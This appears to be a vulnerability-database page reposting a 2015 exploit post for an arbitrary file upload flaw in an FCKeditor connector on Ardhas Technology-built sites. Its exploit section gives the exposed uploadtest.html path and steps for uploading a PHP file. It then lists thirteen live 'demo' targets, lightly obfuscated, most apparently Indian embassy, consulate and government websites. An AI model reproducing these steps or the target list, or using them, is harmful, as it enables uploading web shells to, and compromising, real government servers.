Ardhas Technology (Fckeditor) Arbitrary File Upload Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1040673 漏洞类型
发布时间 2015-12-17 更新时间 2015-12-17
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2015120191
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
 /*//*//*//*//*//*//*//*//*//*//*//*//*//*//*//*//*//*//*//*/

!*! Exploit Title : Ardhas Technology (Fckeditor) Arbitrary File Upload Vulnerability

!*! Exploit Author : Malw4r3

!*! Vendor Homepage : http://www.ardhas.com/

!*! Date: 12/17/2015

!*! Tested On : Linux , Windows

/*//*//*//*//*//*//*//*//*//*//*//*//*//*//*//*//*//*//*//*/

!*! exploit => config/fckeditor/editor/filemanager/connectors/uploadtest.html

!*! select => Select the "File Uploader"> php ... upload to : Uploaded File URL:

!*! Demo(s) Site :

!*! http://roiramallaXh.org/config/fckeditor/editor/filemanager/connectors/uploadtest.html
!*! http://www.indeXmbassy.co.il//config/fckeditor/editor/filemanager/connectors/uploadtest.html
!*! https://www.hcXilondon.in/config/fckeditor/editor/filemanager/connectors/uploadtest.html
!*! https://www.pminewyorXk.org/config/fckeditor/editor/filemanager/connectors/uploadtest.html
!*! http://www.indianembXassy.at//config/fckeditor/editor/filemanager/connectors/uploadtest.html
!*! https://www.hcisingaXpore.gov.in/config/fckeditor/editor/filemanager/connectors/uploadtest.html
!*! http://www.indembXassysuriname.com/config/fckeditor/editor/filemanager/connectors/uploadtest.html
!*! http://www.cgimuXnich.com/config/fckeditor/editor/filemanager/connectors/uploadtest.html
!*! http://www.indiaXnembassy.am/config/fckeditor/editor/filemanager/connectors/uploadtest.html
!*! http://www.cgieXdinburgh.org/config/fckeditor/editor/filemanager/connectors/uploadtest.html
!*! https://www.inXdianembassy.se/config/fckeditor/editor/filemanager/connectors/uploadtest.html
!*! https://www.cXgifrankfurt.de/config/fckeditor/editor/filemanager/connectors/uploadtest.html
!*! http://www.iXndianembassythimphu.bt/config/fckeditor/editor/filemanager/connectors/uploadtest.html


/*//*//*//*//*//*//*//*//*//*//*//*//*//*//*//*//*//*//*//*/